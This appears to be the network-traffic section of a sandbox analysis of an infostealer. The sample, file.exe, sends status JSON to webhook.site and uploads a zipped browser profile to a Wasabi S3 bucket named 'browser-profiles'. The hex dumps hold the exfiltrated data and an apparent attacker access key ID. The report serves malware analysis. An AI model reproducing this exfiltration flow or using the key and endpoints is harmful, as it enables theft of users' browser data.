            Aug 22, 2024 15:39:38.037616014 CEST192.168.2.71.1.1.10xa33Standard query (0)s3.ap-southeast-1.wasabisys.comA (IP address)IN (0x0001)false
            Aug 22, 2024 15:39:44.361763954 CEST192.168.2.71.1.1.10xae83Standard query (0)webhook.siteA (IP address)IN (0x0001)false

            DNS Answers

            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Aug 22, 2024 15:39:32.934443951 CEST1.1.1.1192.168.2.70x79d4No error (0)webhook.site46.4.105.116A (IP address)IN (0x0001)false
            Aug 22, 2024 15:39:32.934443951 CEST1.1.1.1192.168.2.70x79d4No error (0)webhook.site178.63.67.106A (IP address)IN (0x0001)false
            Aug 22, 2024 15:39:32.934443951 CEST1.1.1.1192.168.2.70x79d4No error (0)webhook.site178.63.67.153A (IP address)IN (0x0001)false
            Aug 22, 2024 15:39:38.051115036 CEST1.1.1.1192.168.2.70xa33No error (0)s3.ap-southeast-1.wasabisys.comap-southeast-1.wasabisys.comCNAME (Canonical name)IN (0x0001)false
            Aug 22, 2024 15:39:38.051115036 CEST1.1.1.1192.168.2.70xa33No error (0)ap-southeast-1.wasabisys.com154.18.200.102A (IP address)IN (0x0001)false
            Aug 22, 2024 15:39:38.051115036 CEST1.1.1.1192.168.2.70xa33No error (0)ap-southeast-1.wasabisys.com154.18.200.103A (IP address)IN (0x0001)false
            Aug 22, 2024 15:39:38.051115036 CEST1.1.1.1192.168.2.70xa33No error (0)ap-southeast-1.wasabisys.com154.18.200.100A (IP address)IN (0x0001)false
            Aug 22, 2024 15:39:38.051115036 CEST1.1.1.1192.168.2.70xa33No error (0)ap-southeast-1.wasabisys.com154.18.200.101A (IP address)IN (0x0001)false
            Aug 22, 2024 15:39:44.371025085 CEST1.1.1.1192.168.2.70xae83No error (0)webhook.site178.63.67.153A (IP address)IN (0x0001)false
            Aug 22, 2024 15:39:44.371025085 CEST1.1.1.1192.168.2.70xae83No error (0)webhook.site46.4.105.116A (IP address)IN (0x0001)false
            Aug 22, 2024 15:39:44.371025085 CEST1.1.1.1192.168.2.70xae83No error (0)webhook.site178.63.67.106A (IP address)IN (0x0001)false

            HTTP Request Dependency Graph

            • webhook.site
            • s3.ap-southeast-1.wasabisys.com

            HTTPS Proxied Packets

            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.74970246.4.105.1164437564C:\Users\user\Desktop\file.exe
            TimestampBytes transferredDirectionData
            2024-08-22 13:39:33 UTC183OUTPOST /efe6628a-60cc-4d7a-bd08-479e31e08de5 HTTP/1.1
            Host: webhook.site
            User-Agent: Go-http-client/1.1
            Content-Length: 309
            Content-Type: application/json
            Accept-Encoding: gzip
            2024-08-22 13:39:33 UTC309OUTData Raw: 7b 22 63 61 6d 70 61 69 67 6e 5f 69 64 22 3a 22 41 44 54 59 30 30 30 31 22 2c 22 64 65 76 69 63 65 5f 69 64 22 3a 22 31 39 38 38 32 37 34 32 2d 43 43 35 36 2d 31 41 35 39 2d 39 37 37 39 2d 46 42 38 43 42 46 41 31 45 32 39 44 22 2c 22 65 72 72 6f 72 22 3a 22 22 2c 22 6f 73 5f 76 65 72 73 69 6f 6e 22 3a 22 57 69 6e 64 6f 77 73 20 31 30 20 31 30 2e 30 2e 31 39 30 34 35 22 2c 22 73 65 73 73 69 6f 6e 5f 69 64 22 3a 22 38 36 63 35 36 62 32 36 2d 35 36 64 36 2d 34 63 64 38 2d 61 62 33 32 2d 39 64 64 64 31 39 32 36 64 34 66 37 22 2c 22 73 74 61 74 65 22 3a 22 53 74 61 72 74 69 6e 67 20 73 63 72 69 70 74 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 32 34 33 33 33 39 37 32 2c 22 75 73 65 72 5f 64 61 74 61 5f 70 61 74 68 22 3a 22 43 3a 5c 5c 55 73 65 72 73 5c 5c
            Data Ascii: {"campaign_id":"ADTY0001","device_id":"19882742-CC56-1A59-9779-FB8CBFA1E29D","error":"","os_version":"Windows 10 10.0.19045","session_id":"86c56b26-56d6-4cd8-ab32-9ddd1926d4f7","state":"Starting script","timestamp":1724333972,"user_data_path":"C:\\Users\\
            2024-08-22 13:39:34 UTC317INHTTP/1.1 200 OK
            Server: nginx
            Content-Type: text/html; charset=UTF-8
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            X-Request-Id: 43544593-cc04-4fd9-a7ba-dcbf330e7a9a
            X-Token-Id: efe6628a-60cc-4d7a-bd08-479e31e08de5
            Cache-Control: no-cache, private
            Date: Thu, 22 Aug 2024 13:39:34 GMT
            2024-08-22 13:39:34 UTC156INData Raw: 39 31 0d 0a 54 68 69 73 20 55 52 4c 20 68 61 73 20 6e 6f 20 64 65 66 61 75 6c 74 20 63 6f 6e 74 65 6e 74 20 63 6f 6e 66 69 67 75 72 65 64 2e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 68 6f 6f 6b 2e 73 69 74 65 2f 23 21 2f 76 69 65 77 2f 65 66 65 36 36 32 38 61 2d 36 30 63 63 2d 34 64 37 61 2d 62 64 30 38 2d 34 37 39 65 33 31 65 30 38 64 65 35 22 3e 56 69 65 77 20 69 6e 20 57 65 62 68 6f 6f 6b 2e 73 69 74 65 3c 2f 61 3e 2e 0d 0a 30 0d 0a 0d 0a
            Data Ascii: 91This URL has no default content configured. <a href="https://webhook.site/#!/view/efe6628a-60cc-4d7a-bd08-479e31e08de5">View in Webhook.site</a>.0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.74970546.4.105.1164437564C:\Users\user\Desktop\file.exe
            TimestampBytes transferredDirectionData
            2024-08-22 13:39:36 UTC183OUTPOST /efe6628a-60cc-4d7a-bd08-479e31e08de5 HTTP/1.1
            Host: webhook.site
            User-Agent: Go-http-client/1.1
            Content-Length: 317
            Content-Type: application/json
            Accept-Encoding: gzip
            2024-08-22 13:39:36 UTC317OUTData Raw: 7b 22 63 61 6d 70 61 69 67 6e 5f 69 64 22 3a 22 41 44 54 59 30 30 30 31 22 2c 22 64 65 76 69 63 65 5f 69 64 22 3a 22 31 39 38 38 32 37 34 32 2d 43 43 35 36 2d 31 41 35 39 2d 39 37 37 39 2d 46 42 38 43 42 46 41 31 45 32 39 44 22 2c 22 65 72 72 6f 72 22 3a 22 22 2c 22 6f 73 5f 76 65 72 73 69 6f 6e 22 3a 22 57 69 6e 64 6f 77 73 20 31 30 20 31 30 2e 30 2e 31 39 30 34 35 22 2c 22 73 65 73 73 69 6f 6e 5f 69 64 22 3a 22 38 36 63 35 36 62 32 36 2d 35 36 64 36 2d 34 63 64 38 2d 61 62 33 32 2d 39 64 64 64 31 39 32 36 64 34 66 37 22 2c 22 73 74 61 74 65 22 3a 22 43 6f 70 79 69 6e 67 20 66 69 6c 65 73 20 63 6f 6d 70 6c 65 74 65 64 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 32 34 33 33 33 39 37 34 2c 22 75 73 65 72 5f 64 61 74 61 5f 70 61 74 68 22 3a 22 43 3a 5c
            Data Ascii: {"campaign_id":"ADTY0001","device_id":"19882742-CC56-1A59-9779-FB8CBFA1E29D","error":"","os_version":"Windows 10 10.0.19045","session_id":"86c56b26-56d6-4cd8-ab32-9ddd1926d4f7","state":"Copying files completed","timestamp":1724333974,"user_data_path":"C:\
            2024-08-22 13:39:36 UTC317INHTTP/1.1 200 OK
            Server: nginx
            Content-Type: text/html; charset=UTF-8
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            X-Request-Id: 842b23f4-a07b-481c-b0db-c073197ce9f0
            X-Token-Id: efe6628a-60cc-4d7a-bd08-479e31e08de5
            Cache-Control: no-cache, private
            Date: Thu, 22 Aug 2024 13:39:36 GMT
            2024-08-22 13:39:36 UTC156INData Raw: 39 31 0d 0a 54 68 69 73 20 55 52 4c 20 68 61 73 20 6e 6f 20 64 65 66 61 75 6c 74 20 63 6f 6e 74 65 6e 74 20 63 6f 6e 66 69 67 75 72 65 64 2e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 68 6f 6f 6b 2e 73 69 74 65 2f 23 21 2f 76 69 65 77 2f 65 66 65 36 36 32 38 61 2d 36 30 63 63 2d 34 64 37 61 2d 62 64 30 38 2d 34 37 39 65 33 31 65 30 38 64 65 35 22 3e 56 69 65 77 20 69 6e 20 57 65 62 68 6f 6f 6b 2e 73 69 74 65 3c 2f 61 3e 2e 0d 0a 30 0d 0a 0d 0a
            Data Ascii: 91This URL has no default content configured. <a href="https://webhook.site/#!/view/efe6628a-60cc-4d7a-bd08-479e31e08de5">View in Webhook.site</a>.0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            2192.168.2.74970846.4.105.1164437564C:\Users\user\Desktop\file.exe
            TimestampBytes transferredDirectionData
            2024-08-22 13:39:37 UTC183OUTPOST /efe6628a-60cc-4d7a-bd08-479e31e08de5 HTTP/1.1
            Host: webhook.site
            User-Agent: Go-http-client/1.1
            Content-Length: 317
            Content-Type: application/json
            Accept-Encoding: gzip
            2024-08-22 13:39:37 UTC317OUTData Raw: 7b 22 63 61 6d 70 61 69 67 6e 5f 69 64 22 3a 22 41 44 54 59 30 30 30 31 22 2c 22 64 65 76 69 63 65 5f 69 64 22 3a 22 31 39 38 38 32 37 34 32 2d 43 43 35 36 2d 31 41 35 39 2d 39 37 37 39 2d 46 42 38 43 42 46 41 31 45 32 39 44 22 2c 22 65 72 72 6f 72 22 3a 22 22 2c 22 6f 73 5f 76 65 72 73 69 6f 6e 22 3a 22 57 69 6e 64 6f 77 73 20 31 30 20 31 30 2e 30 2e 31 39 30 34 35 22 2c 22 73 65 73 73 69 6f 6e 5f 69 64 22 3a 22 38 36 63 35 36 62 32 36 2d 35 36 64 36 2d 34 63 64 38 2d 61 62 33 32 2d 39 64 64 64 31 39 32 36 64 34 66 37 22 2c 22 73 74 61 74 65 22 3a 22 5a 69 70 70 69 6e 67 20 66 69 6c 65 73 20 63 6f 6d 70 6c 65 74 65 64 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 32 34 33 33 33 39 37 36 2c 22 75 73 65 72 5f 64 61 74 61 5f 70 61 74 68 22 3a 22 43 3a 5c
            Data Ascii: {"campaign_id":"ADTY0001","device_id":"19882742-CC56-1A59-9779-FB8CBFA1E29D","error":"","os_version":"Windows 10 10.0.19045","session_id":"86c56b26-56d6-4cd8-ab32-9ddd1926d4f7","state":"Zipping files completed","timestamp":1724333976,"user_data_path":"C:\
            2024-08-22 13:39:38 UTC317INHTTP/1.1 200 OK
            Server: nginx
            Content-Type: text/html; charset=UTF-8
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            X-Request-Id: fd7d7ef4-da08-43e3-a867-f58379e95f35
            X-Token-Id: efe6628a-60cc-4d7a-bd08-479e31e08de5
            Cache-Control: no-cache, private
            Date: Thu, 22 Aug 2024 13:39:37 GMT
            2024-08-22 13:39:38 UTC156INData Raw: 39 31 0d 0a 54 68 69 73 20 55 52 4c 20 68 61 73 20 6e 6f 20 64 65 66 61 75 6c 74 20 63 6f 6e 74 65 6e 74 20 63 6f 6e 66 69 67 75 72 65 64 2e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 68 6f 6f 6b 2e 73 69 74 65 2f 23 21 2f 76 69 65 77 2f 65 66 65 36 36 32 38 61 2d 36 30 63 63 2d 34 64 37 61 2d 62 64 30 38 2d 34 37 39 65 33 31 65 30 38 64 65 35 22 3e 56 69 65 77 20 69 6e 20 57 65 62 68 6f 6f 6b 2e 73 69 74 65 3c 2f 61 3e 2e 0d 0a 30 0d 0a 0d 0a
            Data Ascii: 91This URL has no default content configured. <a href="https://webhook.site/#!/view/efe6628a-60cc-4d7a-bd08-479e31e08de5">View in Webhook.site</a>.0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            3192.168.2.749709154.18.200.1024437564C:\Users\user\Desktop\file.exe
            TimestampBytes transferredDirectionData
            2024-08-22 13:39:39 UTC588OUTPOST /browser-profiles/20240822093937-19882742-CC56-1A59-9779-FB8CBFA1E29D.zip?uploads= HTTP/1.1
            Host: s3.ap-southeast-1.wasabisys.com
            User-Agent: aws-sdk-go/1.55.5 (go1.22.6; windows; 386)
            Content-Length: 0
            Authorization: AWS4-HMAC-SHA256 Credential=28JW7MUJ64BNM9GCHFBF/20240822/ap-southeast-1/s3/aws4_request, SignedHeaders=host;x-amz-content-sha256;x-amz-date, Signature=7bfac1be89efd460cd5fea81c7026f20557c4c8b2dfedc90e41c9b274ff695e9
            X-Amz-Content-Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
            X-Amz-Date: 20240822T133937Z
            Accept-Encoding: gzip
            2024-08-22 13:39:39 UTC391INHTTP/1.1 200 OK
            Connection: close
            Date: Thu, 22 Aug 2024 13:39:39 GMT
            Server: WasabiS3/7.20.2957-2024-08-05-c5ee44c55d (R107-U11)
            x-amz-id-2: 81Fe4I5jJ24eFApIhMmVnfa/VW6PMNKgK8pk0hCPaLQWzU03ip8E6f5LpUH/qBdqHOsBteTHRInM
            x-amz-request-id: 282C40BA080DD19D:A
            x-wasabi-cm-reference-id: 1724333978736 154.18.200.102 ConID:209765873/EngineConID:2025570/Core:8
            Transfer-Encoding: chunked
            2024-08-22 13:39:39 UTC410INData Raw: 31 38 65 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 49 6e 69 74 69 61 74 65 4d 75 6c 74 69 70 61 72 74 55 70 6c 6f 61 64 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 64 6f 63 2f 32 30 30 36 2d 30 33 2d 30 31 2f 22 3e 3c 42 75 63 6b 65 74 3e 62 72 6f 77 73 65 72 2d 70 72 6f 66 69 6c 65 73 3c 2f 42 75 63 6b 65 74 3e 3c 4b 65 79 3e 32 30 32 34 30 38 32 32 30 39 33 39 33 37 2d 31 39 38 38 32 37 34 32 2d 43 43 35 36 2d 31 41 35 39 2d 39 37 37 39 2d 46 42 38 43 42 46 41 31 45 32 39 44 2e 7a 69 70 3c 2f 4b 65 79 3e 3c 55 70 6c 6f 61 64 49 64 3e 45 65 30 4c 36 39 46 73 62 6e 6c 32 44 49 61 66 4c 32 39 48 50 36 2d
            Data Ascii: 18e<?xml version="1.0" encoding="UTF-8"?><InitiateMultipartUploadResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/"><Bucket>browser-profiles</Bucket><Key>20240822093937-19882742-CC56-1A59-9779-FB8CBFA1E29D.zip</Key><UploadId>Ee0L69Fsbnl2DIafL29HP6-


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            4192.168.2.749711154.18.200.1024437564C:\Users\user\Desktop\file.exe
            TimestampBytes transferredDirectionData
            2024-08-22 13:39:41 UTC800OUTPUT /browser-profiles/20240822093937-19882742-CC56-1A59-9779-FB8CBFA1E29D.zip?partNumber=1&uploadId=Ee0L69Fsbnl2DIafL29HP6-TgJNxOOr1DYqImM_STgfVcBDub2OcNG-UV5TvF65k7r3QeCTgxwqK-iVhXES85dRSMEQLe1J0NQHUVQqfbBqcsNqUTvcAaqJe3k7pKnyq HTTP/1.1
            Host: s3.ap-southeast-1.wasabisys.com
            User-Agent: aws-sdk-go/1.55.5 (go1.22.6; windows; 386)
            Content-Length: 408281
            Authorization: AWS4-HMAC-SHA256 Credential=28JW7MUJ64BNM9GCHFBF/20240822/ap-southeast-1/s3/aws4_request, SignedHeaders=content-length;content-md5;host;x-amz-content-sha256;x-amz-date, Signature=c4aaaf3a69b3c94bd46207c66b4d5a570059d2c3e446279c9acb396f7362727d
            Content-Md5: TtJHzCB9zA1h/QzxKJbVng==
            X-Amz-Content-Sha256: 03bf56980a4a42ffe927d6b9fa22200195e0cf74ba95ea52cff7205e237e7182
            X-Amz-Date: 20240822T133939Z
            Accept-Encoding: gzip
            2024-08-22 13:39:41 UTC2372OUTData Raw: 50 4b 03 04 14 00 08 08 08 00 f1 4c 16 59 00 00 00 00 00 00 00 00 00 00 00 00 2b 00 09 00 55 73 65 72 20 44 61 74 61 20 54 65 6d 70 5c 44 65 66 61 75 6c 74 5c 41 66 66 69 6c 69 61 74 69 6f 6e 20 44 61 74 61 62 61 73 65 55 54 05 00 01 96 3f c7 66 ec da cd 6e e3 54 14 c0 f1 eb ba 8d db 84 d6 65 51 45 a8 12 ba d5 80 88 35 09 28 42 ac ba 80 90 9a 21 22 75 a6 69 8a e8 ca 72 93 db c1 10 c7 69 ec 8c a6 cb cc ec 79 1d 5e 60 36 b3 82 47 18 16 6c 91 d8 b1 44 ce 47 1b 67 5a 05 56 03 d1 ff 27 b5 ca f1 b1 af 8f cf 75 22 5d cb a7 27 75 3f 56 f2 32 1c 04 5e 2c 3f 15 bb 42 d3 c4 17 52 0a 21 36 84 10 39 71 2b 23 84 58 9f 8b 35 b1 dc 86 f8 f8 87 5f b7 cd bf 44 36 fb 5a 98 4f cc 5f 76 7e de 51 db fa ce 07 ef 5c e7 7e ca be ce 9d 2c 1b 00 00 00 00 f8 37 c2 2d 23 6f 59 da e8
            Data Ascii: PKLY+User Data Temp\Default\Affiliation DatabaseUT?fnTeQE5(B!"uiriy^`6GlDGgZV'u"]'u?V2^,?BR!69q+#X5_D6ZO_v~Q\~,7-#oY
            2024-08-22 13:39:41 UTC3558OUTData Raw: a4 da 95 9c 72 51 94 44 14 f8 df 8b 1f c3 bb bf e8 1b 8c c9 c7 80 0f 88 bc b0 3e 3a e8 56 10 26 2b e1 60 9c 03 a7 73 1c e6 e7 6d d2 29 9b 31 6b 1f 1c 4c 3f 7d b2 99 62 88 fd fd f7 5f 56 0e 26 38 1d df 12 8c 37 1f 2e da c5 de f8 b0 14 44 e7 27 ff 81 ce 8b 10 b7 30 69 08 36 ce 19 da de 58 fd 01 f7 39 62 73 22 a2 ae 69 b9 13 aa 61 84 29 26 55 4d 65 59 d7 4c 70 c2 b8 6c f6 52 aa ea 48 0b 42 8e 6a 7f 14 b2 3a 29 2a a4 da ef 4e 9c 35 b4 fa 6e 88 03 4c 59 27 db 82 bb 76 e0 f4 5f b3 d2 52 10 fa 9c 95 72 8a b7 9b c7 76 f3 15 00 00 ff ff 50 4b 07 08 e2 1a 5b 03 02 01 00 00 9e 01 00 00 50 4b 03 04 14 00 08 08 08 00 f1 4c 16 59 00 00 00 00 00 00 00 00 00 00 00 00 2a 00 09 00 55 73 65 72 20 44 61 74 61 20 54 65 6d 70 5c 44 65 66 61 75 6c 74 5c 42 75 64 67 65 74 44 61
            Data Ascii: rQD>:V&+`sm)1kL?}b_V&87.D'0i6X9bs"ia)&UMeYLplRHBj:)*N5nLY'v_RrvPK[PKLY*User Data Temp\Default\BudgetDa
            2024-08-22 13:39:41 UTC4744OUTData Raw: 00 00 ff ff 50 4b 07 08 00 00 00 00 05 00 00 00 00 00 00 00 50 4b 03 04 14 00 08 08 08 00 f1 4c 16 59 00 00 00 00 00 00 00 00 00 00 00 00 2c 00 09 00 55 73 65 72 20 44 61 74 61 20 54 65 6d 70 5c 44 65 66 61 75 6c 74 5c 45 78 74 65 6e 73 69 6f 6e 20 53 63 72 69 70 74 73 5c 4c 4f 47 55 54 05 00 01 96 3f c7 66 b4 ce b1 6e 83 30 10 c6 f1 9d a7 b0 d4 19 30 76 a9 28 1b 02 5a 55 6a 3b 84 64 f3 62 99 83 a0 38 3e 64 9b 28 8f 1f e1 88 2d 52 a6 dc 7a 7f 7d fa 31 ca 78 9a d1 94 e6 31 2d ca 77 56 32 9e 7c 14 05 61 39 28 b2 83 c5 4d 66 24 7f d5 ff cf 57 db ed 49 5d 8a 83 03 eb c4 60 d1 f8 1e dc 49 54 f3 dc 48 2f c5 2f 2a a9 c5 37 e2 a8 41 d4 47 8b 67 08 2d 09 df 06 06 b9 68 2f da ab 07 e3 26 34 a4 53 76 9a bd 4b b7 ed 98 ae 97 45 8f 41 9f 1b 48 e1 05 ec 6a d2 38 92 37
            Data Ascii: PKPKLY,User Data Temp\Default\Extension Scripts\LOGUT?fn00v(ZUj;db8>d(-Rz}1x1-wV2|a9(Mf$WI]`ITH//*7AGg-h/&4SvKEAHj87
            2024-08-22 13:39:41 UTC5930OUTData Raw: fb 38 c0 c3 3f c1 91 a1 36 b8 eb 53 a4 11 8d 02 18 ce 10 41 ff 21 62 4c 03 39 f8 bd 13 53 13 92 fe fd 79 d0 c6 0e 09 46 6b 13 84 9b ae c0 9d f7 f6 41 65 9d 17 ba 3f fd 02 ba 2f 7e 01 15 6d 88 df 39 8b 10 55 e1 01 73 b5 40 4d 35 54 30 ba 04 41 77 0a 2d ec 1a d0 c6 77 17 c6 3a c7 d0 90 d4 3a 66 b2 b6 41 a4 a5 19 22 cc cd b0 32 ab 17 56 ae ee 83 08 7b 2b 44 da 5b c0 98 da 46 75 29 ad 63 e6 8c 31 8c 49 6d c9 97 ef 1d 95 fd f2 14 93 b5 d3 1d 97 ea 45 63 72 3b 98 ed ed 82 c5 de 4e b4 2b 5b 41 1b df 02 a6 c4 76 62 4a 68 13 0c 09 6d c4 62 1b 45 7d 7c ab 5b a5 b8 3c 45 ba 87 f8 35 bc d4 d2 3e cd 6c ef ce b7 38 fb 3c b1 29 c3 68 71 f4 a2 d9 d6 09 66 3b 43 0f 5a 9c 43 68 b2 f5 50 a3 bd bb 20 70 65 cb 54 c5 84 34 7e 2f 1a 6d 1d 71 16 e7 e0 5e 8b b3 f7 33 f1 b9 d2 cd
            Data Ascii: 8?6SA!bL9SyFkAe?/~m9Us@M5T0Aw-w::fA"2V{+D[Fu)c1ImEcr;N+[AvbJhmbE}|[<E5>l8<)hqf;CZChP peT4~/mq^3
            2024-08-22 13:39:41 UTC7116OUTData Raw: ba 0a 8d f6 8e fb 34 09 ed ca af aa e7 ff 6f 49 2d 61 c3 3f ee a7 18 4f 6c 0e 8b 7e be 83 27 17 2f 48 7c 72 49 72 f2 ae a0 8d 89 bb 97 be 9c bc 3b e8 82 75 77 d0 68 d2 ee 65 b0 f4 c5 e7 c8 6d 15 38 72 47 c5 f5 f7 ef a8 f0 3e ff ad 4a 61 ab e2 2d af 49 e1 1a 9e ef ab ef 45 fc f6 2d e7 ec df 34 3d a6 b8 5d 66 f9 1e bb 6c d5 66 db 9e e0 73 dc af 90 17 8c d6 ec 20 8e e4 3d c1 60 db b3 08 62 8b d2 70 72 e5 08 4c aa 12 70 b2 0b 70 52 35 e2 1d 6e c4 49 55 de b3 b7 57 08 5b 14 55 18 e3 ab fb 56 eb 5f b7 4a f2 7e db 5d 4b d5 b6 6c 55 a9 2d 27 f8 6a 4a b9 0a 6d b9 4a b4 66 07 0b b6 ec 60 21 79 4f a0 60 cd 09 22 d6 1c 25 58 73 82 c0 b6 27 08 55 2f 14 c3 1d 55 88 53 2b c6 e8 e4 4a 81 4c ae 20 c2 14 37 e2 94 77 11 27 55 d2 96 49 15 f4 49 c5 89 61 71 be 8d ff 5c 3f 26
            Data Ascii: 4oI-a?Ol~'/H|rIr;uwhem8rG>Ja-IE-4=]flfs =`bprLppR5nIUW[UV_J~]KlU-'jJmJf`!yO`"%Xs'U/US+JL 7w'UIIaq\?&
            2024-08-22 13:39:41 UTC8302OUTData Raw: 76 31 f9 e2 a4 31 99 c0 3b c6 cb e4 f1 b2 f8 e9 61 b2 77 9e e7 cf ea ff 45 b9 6f 96 98 2e 46 7b f7 7d b1 a9 dd d9 16 67 e7 2b 71 ce ae cb 16 47 cf c0 b8 2e 3d 03 66 47 e7 e5 d8 14 a6 6b 77 b6 25 a5 79 c3 ff 6d 99 ff 5f fa ef 49 6a 29 66 e1 63 ff 0b fb b4 a4 74 9b e2 45 c5 97 be 9f 5f b9 6b a9 3a 79 77 e0 0f 13 77 05 ed 49 de 1d 78 3c 79 77 d0 c7 c9 bb 83 bb 92 77 2b af db 76 2d 80 85 2f bd 4d 6f ab c4 b1 3b 2a c6 3a 6f af 14 3e ba bd 42 78 fb f6 4a e1 99 6f 57 91 ef 2b aa 30 ea 4b ad bc 88 df fe a6 df 6d ff 2f a5 db e4 ef 89 e5 bc 2d 2f 28 d9 9a 1d f4 8c 75 4f f0 7b c9 d9 41 d7 6c f9 c1 68 2f 54 a2 3d 3f 18 6d b9 c1 52 7c 02 25 da 9e 99 4f 2d 45 69 30 a9 72 0c ef a8 a2 62 6c 82 5a c4 3b ea 11 ef a8 41 bc a3 92 5e bd a3 92 9e bd bd 8a 3e 7d bb 1b 93 27 b4
            Data Ascii: v11;awEo.F{}g+qG.=fGkw%ym_Ij)fctE_k:ywwIx<yww+v-/Mo;*:o>BxJoW+0Km/-/(uO{Alh/T=?mR|%O-Ei0rblZ;A^>}'
            2024-08-22 13:39:41 UTC746OUTData Raw: b3 79 74 e2 2f 87 f9 ff ee 7f a9 73 82 c0 3e 58 99 14 8e d4 a6 9c 2d de 94 4a c3 95 c9 23 12 1f 5e 52 c6 cc 59 25 f3 73 c9 9c 5e c1 ca 14 5b bf ce 57 c8 8e 3d 84 50 db d4 ce 55 48 e3 88 e7 fb 9a 0d f9 bb bf 0c 93 9a 28 9d d6 c0 df e9 e5 f9 ac 4c 95 df 6a 2a d7 3f 55 65 ca a8 9c 60 06 89 cd 13 86 3c 35 44 a3 53 5b 29 9d 72 80 74 4e 7a ce 08 71 2c de 67 0e c4 35 4e a0 22 e9 e3 c5 75 a9 17 23 1b 53 78 fe b0 ea 14 95 2f 2c 6c cb 11 a6 f7 a7 28 ec 43 b6 fc 62 29 36 ce f4 3e 2b ff 58 8a 9e 77 8c 8c b5 9d 6c 87 2b e6 c1 8d ff 75 8c 4c 66 1c 34 0e c3 b4 06 93 d8 72 8d 35 9a 2a cf d6 d4 66 6b 6c aa 96 73 6b 74 9e 36 55 a2 53 0f 50 3a f5 00 5c 9c dc 68 7e 04 31 79 bf 38 10 d8 87 2a 53 3e 5b b2 29 95 46 6a 30 df 98 19 12 39 c7 42 a8 6f 2b 72 99 71 0d 5c 95 d7 4c af
            Data Ascii: yt/s>X-J#^RY%s^[W=PUH(Lj*?Ue`<5DS[)rtNzq,g5N"u#Sx/,l(Cb)6>+Xwl+uLf4r5*fklskt6USP:\h~1y8*S>[)Fj09Bo+rq\L
            2024-08-22 13:39:41 UTC10674OUTData Raw: 74 c6 01 d2 35 e9 17 34 05 91 fb 53 fc 66 b4 3e ee 03 8b ca e2 26 17 d7 a4 3e bf 74 4b 3a 8d d4 a4 45 8b 55 7e 44 81 ab b6 ae 0a eb 43 dd f3 54 9e 23 d0 1a 23 57 dc 46 9b 73 a5 fe 18 2e 47 e5 aa 54 fd 32 4f 65 4d 06 94 56 5e 0f 9e dd 9f 87 e9 cd 94 ce 6a 1a 91 39 04 39 be 2d 26 b9 46 60 79 8d e0 e1 9a 66 31 d6 14 1d 93 97 19 22 17 e3 0c 6d 5d f8 8a 31 f3 30 a5 33 9a cd 63 71 4d 74 d2 ff d8 07 44 dc 09 57 a5 6e 5a b6 3d 03 b1 b7 e5 6a 94 38 62 5b 60 2c f3 2e 72 dc ad 5c 96 58 a7 d9 f8 b1 f2 32 a6 d9 b6 8b 68 dc f2 12 c3 77 4d 9a ca 8d 19 cb 11 e6 46 b4 e5 14 4d c3 f9 c5 d5 f1 90 f8 cc 7e cc 7b 39 ab 39 4a 18 fe 32 9f e3 ac 66 53 cf ed 28 f2 40 5a 9c c8 dc 98 3a 4f d7 8c ed 43 30 b3 d1 88 5e 73 9c d2 e9 8d d1 4d 88 e1 ad 7f e4 b3 43 12 fb ea d4 0f 2d dd 9a
            Data Ascii: t54Sf>&>tK:EU~DCT##WFs.GT2OeMV^j99-&F`yf1"m]103cqMtDWnZ=j8b[`,.r\X2hwMFM~{99J2fS(@Z:OC0^sMC-
            2024-08-22 13:39:41 UTC11860OUTData Raw: d7 db be 48 f7 0b 05 e1 ee 67 0a 42 5d 75 be 70 e7 6d de 40 67 c4 19 ea 8b 1f f3 b3 e3 c6 fe ec bf 2f 7f 5f fe be fc 7d f9 bf b0 64 e3 63 b7 fc 4e e3 aa b8 e4 77 9b fe b7 b4 5c 85 cf d4 8b f7 db 62 17 e7 43 73 a6 fa 1f 4e cc 5d fc f0 bc 0f fb cb e2 bf b2 e4 e1 f8 1a ff 86 f8 1f fa 37 c4 1f 0a 94 c5 ff c6 bf 21 e1 8c 7f 43 e2 39 7f 59 22 09 3e 7c 03 dc f0 a3 9f c1 55 f5 14 c6 d7 0f 0f 5c dd 60 9e 1d 57 6f bc 3e ae de d8 7f 75 bd f1 e4 b8 7a a3 62 dc 73 c6 1d 57 d7 9b eb e2 5a 68 4e dc 7f d1 29 63 7d 26 be ef f5 ae cf df fe 7d f9 1f 2d 8c 73 f1 1c b9 5a d6 c7 7d 20 f0 d0 9c 94 a2 87 13 3e e6 7f 38 fe fb fe 0d 89 f5 fe b2 84 36 7f 79 c2 45 7f 59 02 0d 55 27 d2 f0 c6 24 ac 83 95 89 34 50 91 48 03 1b 12 28 1b 2b 2a 4b 82 e0 43 d7 82 a7 6e 15 8c 7f ee 02 8c 6b
            Data Ascii: HgB]upm@g/_}dcNw\bCsN]7!C9Y">|U\`Wo>uzbsWZhN)c}&}-sZ} >86yEYU'$4PH(+*KCnk
